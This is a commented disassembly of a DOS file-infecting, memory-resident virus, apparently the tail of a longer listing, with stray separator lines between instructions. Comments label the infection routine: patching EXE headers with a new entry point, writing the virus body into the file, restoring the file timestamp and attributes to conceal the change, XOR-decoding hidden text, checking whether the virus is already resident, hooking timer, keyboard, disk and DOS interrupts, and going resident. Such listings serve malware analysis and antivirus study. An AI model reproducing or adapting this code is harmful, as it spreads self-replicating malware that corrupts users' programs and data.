0A7B 03062E00 ADD AX,[002E]
|
||
0A7F 83D200 ADC DX,0000
|
||
0A82 050F00 ADD AX,000F
|
||
0A85 83D200 ADC DX,0000
|
||
0A88 25F0FF AND AX,FFF0
|
||
0A8B A35800 MOV [0058],AX
|
||
0A8E 89165A00 MOV [005A],DX
|
||
0A92 050010 ADD AX,1000
|
||
0A95 83D200 ADC DX,0000
|
||
0A98 723A JC 0AD4
|
||
0A9A F7367B00 DIV W/[007B]
|
||
0A9E 0BD2 OR DX,DX
|
||
0AA0 7401 JZ 0AA3
|
||
0AA2 40 INC AX
|
||
0AA3 A33000 MOV [0030],AX
|
||
0AA6 89162E00 MOV [002E],DX
|
||
0AAA A15800 MOV AX,[0058]
|
||
0AAD 8B165A00 MOV DX,[005A]
|
||
0AB1 F7367900 DIV W/[0079]
|
||
0AB5 2B063400 SUB AX,[0034]
|
||
0AB9 A34200 MOV [0042],AX ;NEW CS
|
||
0ABC C7064000B80B MOV [0040],0BB8 ;NEW IP
|
||
0AC2 A33A00 MOV [003A],AX ;NEW SS
|
||
0AC5 C7063C00FE0D MOV [003C],0DFE ;NEW SP
|
||
0ACB 33C9 XOR CX,CX
|
||
0ACD 8BD1 MOV DX,CX
|
||
0ACF B80042 MOV AX,4200 ;Set file pos to 0
|
||
0AD2 CD21 INT 21
|
||
0AD4 720A JC 0AE0
|
||
0AD6 B91C00 MOV CX,001C ;Write NEW Exe header
|
||
0AD9 BA2C00 MOV DX,002C
|
||
0ADC B440 MOV AH,40
|
||
0ADE CD21 INT 21
|
||
0AE0 7211 JC 0AF3
|
||
0AE2 3BC1 CMP AX,CX ;Write succesfull ?
|
||
0AE4 753A JNZ 0B20
|
||
0AE6 8B165800 MOV DX,[0058] ;Set file pos to End of Orig file
|
||
0AEA 8B0E5A00 MOV CX,[005A] ; + 0..15 (paragraph alignment)
|
||
0AEE B80042 MOV AX,4200
|
||
0AF1 CD21 INT 21
|
||
0AF3 722B JC 0B20
|
||
0AF5 A10300 MOV AX,[0003]
|
||
0AF8 0C01 OR AL,01
|
||
0AFA 813E03000080 CMP [0003],8000
|
||
0B00 7202 JC 0B04
|
||
0B02 B000 MOV AL,00
|
||
0B04 A20500 MOV [0005],AL
|
||
0B07 C6065C0001 MOV [005C],01
|
||
0B0C E86400 CALL 0B73
|
||
0B0F 33D2 XOR DX,DX
|
||
0B11 B90010 MOV CX,1000 ;Write virus to file
|
||
0B14 B440 MOV AH,40
|
||
0B16 CD21 INT 21
|
||
0B18 E85800 CALL 0B73
|
||
0B1B C6065C0000 MOV [005C],00
|
||
0B20 2E833E480000 CMP CS:[0048],0000
|
||
0B26 7404 JZ 0B2C
|
||
0B28 B449 MOV AH,49 ;Free allocated memory block
|
||
0B2A CD21 INT 21
|
||
0B2C 2E833E1C00FF CMP CS:[001C],FFFF
|
||
0B32 7431 JZ 0B65
|
||
0B34 2E8B1E1C00 MOV BX,CS:[001C]
|
||
0B39 2E8B162000 MOV DX,CS:[0020]
|
||
0B3E 2E8B0E2200 MOV CX,CS:[0022]
|
||
0B43 B80157 MOV AX,5701 ;Set file time
|
||
0B46 CD21 INT 21
|
||
0B48 B43E MOV AH,3E ;Close file
|
||
0B4A CD21 INT 21
|
||
0B4C 2EC5161800 LDS DX,CS:[0018]
|
||
0B51 2E8B0E1E00 MOV CX,CS:[001E]
|
||
0B56 B80143 MOV AX,4301 ;Set file attribute
|
||
0B59 CD21 INT 21
|
||
0B5B 2EC516E502 LDS DX,CS:[02E5]
|
||
0B60 B82425 MOV AX,2524 ;Set INT 24 to orig (Crit Err)
|
||
0B63 CD21 INT 21
|
||
0B65 07 POP ES
|
||
0B66 1F POP DS
|
||
0B67 5F POP DI
|
||
0B68 5E POP SI
|
||
0B69 5A POP DX
|
||
0B6A 59 POP CX
|
||
0B6B 5B POP BX
|
||
0B6C 58 POP AX
|
||
0B6D 9D POPF
|
||
0B6E 2EFF2ED006 JMP Far CS:[06D0]
|
||
|
||
;---------------------------------------------------------------------------
|
||
0B73 1E PUSH DS ;Decode Text
|
||
0B74 06 PUSH ES
|
||
0B75 57 PUSH DI
|
||
0B76 56 PUSH SI
|
||
0B77 51 PUSH CX
|
||
0B78 50 PUSH AX
|
||
0B79 0E PUSH CS
|
||
0B7A 07 POP ES
|
||
0B7B 0E PUSH CS
|
||
0B7C 1F POP DS
|
||
0B7D BE5E00 MOV SI,005E
|
||
0B80 8BFE MOV DI,SI
|
||
0B82 B9B100 MOV CX,00B1
|
||
0B85 8A260500 MOV AH,[0005]
|
||
0B89 AC LODSB
|
||
0B8A 32C4 XOR AL,AH
|
||
0B8C AA STOSB
|
||
0B8D E2FA LOOP 0B89
|
||
0B8F 58 POP AX
|
||
0B90 59 POP CX
|
||
0B91 5E POP SI
|
||
0B92 5F POP DI
|
||
0B93 07 POP ES
|
||
0B94 1F POP DS
|
||
0B95 C3 RET
|
||
;---------------------------------------------------------------------------
|
||
0B96 33C0 XOR AX,AX ;Zero Registers
|
||
0B98 8BD8 MOV BX,AX
|
||
0B9A 8BD0 MOV DX,AX
|
||
0B9C 8BF0 MOV SI,AX
|
||
0B9E 8BF8 MOV DI,AX
|
||
0BA0 C3 RET
|
||
;---------------------------------------------------------------------------
|
||
;Detect Speed of machine
|
||
0BA1 B400 MOV AH,00 ;Read system timer counter
|
||
0BA3 CD1A INT 1A
|
||
0BA5 8BDA MOV BX,DX ;BX=DX - Low order part of clock
|
||
0BA7 CD1A INT 1A ;Read system timer counter
|
||
0BA9 3BDA CMP BX,DX
|
||
0BAB 74FA JZ 0BA7
|
||
0BAD 33F6 XOR SI,SI
|
||
0BAF 8BDA MOV BX,DX
|
||
0BB1 CD1A INT 1A
|
||
0BB3 46 INC SI
|
||
0BB4 3BDA CMP BX,DX
|
||
0BB6 74F9 JZ 0BB1
|
||
0BB8 2EC7064A0000A0 MOV CS:[004A],A000
|
||
0BBF 8BDE MOV BX,SI
|
||
0BC1 83EB50 SUB BX,0050
|
||
0BC4 81FB000A CMP BX,0A00
|
||
0BC8 7309 JNC 0BD3
|
||
0BCA B104 MOV CL,04
|
||
0BCC D3E3 SHL BX,CL
|
||
0BCE 2E891E4A00 MOV CS:[004A],BX
|
||
0BD3 C3 RET
|
||
;---------------------------------------------------------------------------
|
||
0BD4 1E PUSH DS ;Init timer variables
|
||
0BD5 0E PUSH CS
|
||
0BD6 1F POP DS
|
||
0BD7 C6064F0000 MOV [004F],00
|
||
0BDC C6065C0000 MOV [005C],00
|
||
0BE1 E440 IN AL,[40]
|
||
0BE3 8AE0 MOV AH,AL
|
||
0BE5 E440 IN AL,[40]
|
||
0BE7 8AC4 MOV AL,AH
|
||
0BE9 2E32060500 XOR AL,CS:[0005]
|
||
0BEE 3C1F CMP AL,1F
|
||
0BF0 7205 JC 0BF7
|
||
0BF2 C6064F0001 MOV [004F],01
|
||
0BF7 C70603000100 MOV [0003],0001
|
||
0BFD C70610010000 MOV [0110],0000
|
||
0C03 C6060F0101 MOV [010F],01
|
||
0C08 C6064E0000 MOV [004E],00
|
||
0C0D 1F POP DS
|
||
0C0E C3 RET
|
||
;---------------------------------------------------------------------------
|
||
0C0F 1E PUSH DS
|
||
0C10 06 PUSH ES
|
||
0C11 33C0 XOR AX,AX
|
||
0C13 8ED8 MOV DS,AX
|
||
0C15 A11304 MOV AX,[0413] ;Memory size in KByte
|
||
0C18 B106 MOV CL,06
|
||
0C1A D3E0 SHL AX,CL
|
||
0C1C 8ED8 MOV DS,AX ;DS = A000 or 9E00
|
||
0C1E 33F6 XOR SI,SI
|
||
0C20 8B443E MOV AX,[SI+3E]
|
||
0C23 3DCB3C CMP AX,3CCB
|
||
0C26 7434 JZ 0C5C
|
||
0C28 833E400EFE CMP [0E40],FFFE ;(data in Boot Sector)
|
||
0C2D 7404 JZ 0C33
|
||
0C2F F9 STC
|
||
0C30 EB4E JMP 0C80
|
||
0C32 90 NOP
|
||
0C33 FA CLI
|
||
0C34 B8404B MOV AX,4B40 ;Load Or Exec Program
|
||
0C37 CD21 INT 21 ; !!! AL = 40 ist false call
|
||
0C39 3D7856 CMP AX,5678 ;Error code = 5678 ?
|
||
0C3C 741A JZ 0C58 ; Yes - allready loaded
|
||
0C3E C6067B0F01 MOV [0F7B],01 ; No - Set "Dos complet" flag
|
||
0C43 90 NOP
|
||
0C44 FB STI
|
||
0C45 B82135 MOV AX,3521 ;Get INT 21 addres
|
||
0C48 CD21 INT 21
|
||
0C4A 891ED006 MOV [06D0],BX ;Store INT 21 Orig addres
|
||
0C4E 8C06D206 MOV [06D2],ES
|
||
0C52 BAD406 MOV DX,06D4 ;(? New Offset of INT 21 ?)
|
||
0C55 B82125 MOV AX,2521
|
||
0C58 F8 CLC
|
||
0C59 EB25 JMP 0C80
|
||
0C5B 90 NOP
|
||
0C5C C7443EFEFF MOV [SI+3E],FFFE
|
||
0C61 33C0 XOR AX,AX
|
||
0C63 8ED8 MOV DS,AX
|
||
0C65 8EC0 MOV ES,AX
|
||
0C67 BE0402 MOV SI,0204 ;Set int vector 08 from 81
|
||
0C6A BF2000 MOV DI,0020
|
||
0C6D B90200 MOV CX,0002
|
||
0C70 FA CLI
|
||
0C71 F3A5 REP MOVSW
|
||
0C73 FB STI
|
||
0C74 BE0C02 MOV SI,020C ;Set int vector 13 from 83
|
||
0C77 BF4C00 MOV DI,004C
|
||
0C7A B90200 MOV CX,0002
|
||
0C7D F3A5 REP MOVSW
|
||
0C7F F9 STC
|
||
0C80 07 POP ES
|
||
0C81 1F POP DS
|
||
0C82 C3 RET
|
||
;---------------------------------------------------------------------------
|
||
0C83 E889FF CALL 0C0F
|
||
0C86 7203 JC 0C8B
|
||
0C88 EB0B JMP 0C95
|
||
0C8A 90 NOP
|
||
0C8B B8404B MOV AX,4B40 ;Load or Execute Program
|
||
0C8E CD21 INT 21 ; !!! AL = 40 ist false call
|
||
0C90 3D7856 CMP AX,5678 ;Error code = 5678 ?
|
||
0C93 7513 JNZ 0CA8 ; No -
|
||
0C95 B8414B MOV AX,4B41 ; Yes -
|
||
0C98 BF0001 MOV DI,0100
|
||
0C9B 2E8B8D2400 MOV CX,CS:[DI+0024] ;
|
||
0CA0 BE0010 MOV SI,1000
|
||
0CA3 03F7 ADD SI,DI
|
||
0CA5 FC CLD
|
||
0CA6 CD21 INT 21 ;
|
||
0CA8 8CC8 MOV AX,CS
|
||
0CAA 051000 ADD AX,0010
|
||
0CAD 8ED0 MOV SS,AX
|
||
0CAF BCEE0D MOV SP,0DEE
|
||
0CB2 50 PUSH AX
|
||
0CB3 B8B80B MOV AX,0BB8
|
||
0CB6 50 PUSH AX
|
||
0CB7 CB RET Far ;>> Goto 0CB8
|
||
|
||
;---------------------------------------------------------------------------
|
||
0CB8 FC CLD
|
||
0CB9 06 PUSH ES
|
||
0CBA E852FF CALL 0C0F
|
||
0CBD 2E8C062600 MOV CS:[0026],ES
|
||
0CC2 2E8C068100 MOV CS:[0081],ES
|
||
0CC7 2E8C068500 MOV CS:[0085],ES
|
||
0CCC 2E8C068900 MOV CS:[0089],ES
|
||
0CD1 8CC0 MOV AX,ES
|
||
0CD3 051000 ADD AX,0010
|
||
0CD6 2E01065400 ADD CS:[0054],AX
|
||
0CDB 2E01065600 ADD CS:[0056],AX
|
||
0CE0 B8404B MOV AX,4B40 ;
|
||
0CE3 CD21 INT 21 ;
|
||
0CE5 3D7856 CMP AX,5678 ;
|
||
0CE8 7513 JNZ 0CFD
|
||
0CEA 07 POP ES
|
||
0CEB 2E8E165600 MOV SS,CS:[0056]
|
||
0CF0 2E8B265000 MOV SP,CS:[0050]
|
||
0CF5 E89EFE CALL 0B96 ;Zero registers
|
||
0CF8 2EFF2E5200 JMP Far CS:[0052]
|
||
|
||
0CFD E873FE CALL 0B73 ;Decode Text
|
||
0D00 E89EFE CALL 0BA1 ;Detect speed of machine
|
||
0D03 33C0 XOR AX,AX
|
||
0D05 8EC0 MOV ES,AX
|
||
0D07 26A1FC03 MOV AX,ES:[03FC] ;Save INT FF Ofs into 0028
|
||
0D0B 2EA32800 MOV CS:[0028],AX
|
||
0D0F 26A0FE03 MOV AL,ES:[03FE] ;Save INT FF Seg (Lo) into 002A
|
||
0D13 2EA22A00 MOV CS:[002A],AL
|
||
0D17 26C706FC03F3A5 MOV ES:[03FC],A5F3 ;0000:03FC = F3 A5 -> REP MOVSW
|
||
0D1E 26C606FE03CB MOV ES:[03FE],CB ; 03FE = CB -> RET Far
|
||
0D24 58 POP AX ; +---+---+
|
||
0D25 051000 ADD AX,0010 ;
|
||
0D28 8EC0 MOV ES,AX ;
|
||
0D2A 0E PUSH CS ; Move from DS:0 to ES:0
|
||
0D2B 1F POP DS ; 800 word
|
||
0D2C B90010 MOV CX,1000 ;
|
||
0D2F D1E9 SHR CX,1 ;
|
||
0D31 33F6 XOR SI,SI ;
|
||
0D33 8BFE MOV DI,SI ;
|
||
0D35 06 PUSH ES ;
|
||
0D36 B83F0C MOV AX,0C3F ;
|
||
0D39 50 PUSH AX ;
|
||
0D3A EAFC030000 JMP 0000:03FC ; +
|
||
; |
|
||
0D3F 8CC8 MOV AX,CS ; <--+
|
||
0D41 8ED0 MOV SS,AX
|
||
0D43 BCEE0D MOV SP,0DEE
|
||
0D46 33C0 XOR AX,AX
|
||
0D48 8ED8 MOV DS,AX
|
||
0D4A 2EA12800 MOV AX,CS:[0028] ;Restore INT FF Ofs
|
||
0D4E A3FC03 MOV [03FC],AX
|
||
0D51 2EA02A00 MOV AL,CS:[002A] ;Restore INT FF Seg (Lo)
|
||
0D55 A2FE03 MOV [03FE],AL
|
||
0D58 BB0010 MOV BX,1000
|
||
0D5B B104 MOV CL,04
|
||
0D5D D3EB SHR BX,CL
|
||
0D5F 83C340 ADD BX,0040
|
||
0D62 B44A MOV AH,4A ;Modify memory allocation
|
||
0D64 2E8E062600 MOV ES,CS:[0026]
|
||
0D69 CD21 INT 21
|
||
0D6B B82135 MOV AX,3521 ;Get INT 21 vector
|
||
0D6E CD21 INT 21
|
||
0D70 2E891ED006 MOV CS:[06D0],BX ;Store it
|
||
0D75 2E8C06D206 MOV CS:[06D2],ES
|
||
0D7A 0E PUSH CS
|
||
0D7B 1F POP DS
|
||
0D7C BAD406 MOV DX,06D4 ;Set INT 21 vector
|
||
0D7F B82125 MOV AX,2521
|
||
0D82 CD21 INT 21
|
||
0D84 8E062600 MOV ES,[0026]
|
||
0D88 268E062C00 MOV ES,ES:[002C] ;Segment of DOS ENVRONMENT string
|
||
0D8D 33FF XOR DI,DI
|
||
0D8F B9FF7F MOV CX,7FFF
|
||
0D92 32C0 XOR AL,AL
|
||
0D94 F2AE REPNZ SCASB
|
||
0D96 263805 CMP ES:[DI],AL
|
||
0D99 E0F9 LOOPNZ 0D94
|
||
0D9B 8BD7 MOV DX,DI
|
||
0D9D 83C203 ADD DX,0003
|
||
0DA0 B8004B MOV AX,4B00
|
||
0DA3 06 PUSH ES
|
||
0DA4 1F POP DS
|
||
0DA5 0E PUSH CS
|
||
0DA6 07 POP ES
|
||
0DA7 BB7D00 MOV BX,007D
|
||
0DAA 1E PUSH DS
|
||
0DAB 06 PUSH ES
|
||
0DAC 50 PUSH AX
|
||
0DAD 53 PUSH BX
|
||
0DAE 51 PUSH CX
|
||
0DAF 52 PUSH DX
|
||
0DB0 0E PUSH CS
|
||
0DB1 1F POP DS
|
||
0DB2 B80835 MOV AX,3508 ;Get INT 08 vector
|
||
0DB5 CD21 INT 21
|
||
0DB7 891E2103 MOV [0321],BX ;Stor it
|
||
0DBB 8C062303 MOV [0323],ES
|
||
0DBF BAEC02 MOV DX,02EC ;
|
||
0DC2 E80FFE CALL 0BD4
|
||
0DC5 B80825 MOV AX,2508 ;Set INT 08
|
||
0DC8 CD21 INT 21
|
||
|
||
0DCA B80935 MOV AX,3509 ;Get INT 09 vector
|
||
0DCD CD21 INT 21
|
||
0DCF 891E0600 MOV [0006],BX ;Store it
|
||
0DD3 8C060800 MOV [0008],ES
|
||
0DD7 BAB103 MOV DX,03B1 ;Set INT 09 vector
|
||
0DDA B80925 MOV AX,2509
|
||
0DDD CD21 INT 21
|
||
|
||
0DDF B81335 MOV AX,3513 ;Get INT 13 vector
|
||
0DE2 CD21 INT 21
|
||
0DE4 891E0A00 MOV [000A],BX ;Store it
|
||
0DE8 8C060C00 MOV [000C],ES
|
||
0DEC BA2605 MOV DX,0526 ;Set INT 13 vector
|
||
0DEF B81325 MOV AX,2513
|
||
0DF2 CD21 INT 21
|
||
0DF4 5A POP DX
|
||
0DF5 59 POP CX
|
||
0DF6 5B POP BX
|
||
0DF7 58 POP AX
|
||
0DF8 07 POP ES
|
||
0DF9 1F POP DS
|
||
0DFA 9C PUSHF
|
||
0DFB 2EFF1ED006 CALL Far CS:[06D0]
|
||
0E00 1E PUSH DS
|
||
0E01 07 POP ES
|
||
0E02 B449 MOV AH,49 ;Free allocated memory
|
||
0E04 CD21 INT 21
|
||
0E06 B44D MOV AH,4D ;Get return code of subprocess
|
||
0E08 CD21 INT 21
|
||
0E0A B431 MOV AH,31 ;Terminate And Stay Resident
|
||
0E0C BA0010 MOV DX,1000
|
||
0E0F B104 MOV CL,04
|
||
0E11 D3EA SHR DX,CL
|
||
0E13 83C240 ADD DX,0040
|
||
0E16 CD21 INT 21
|
||
;---------------------------------------------------------------------------
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|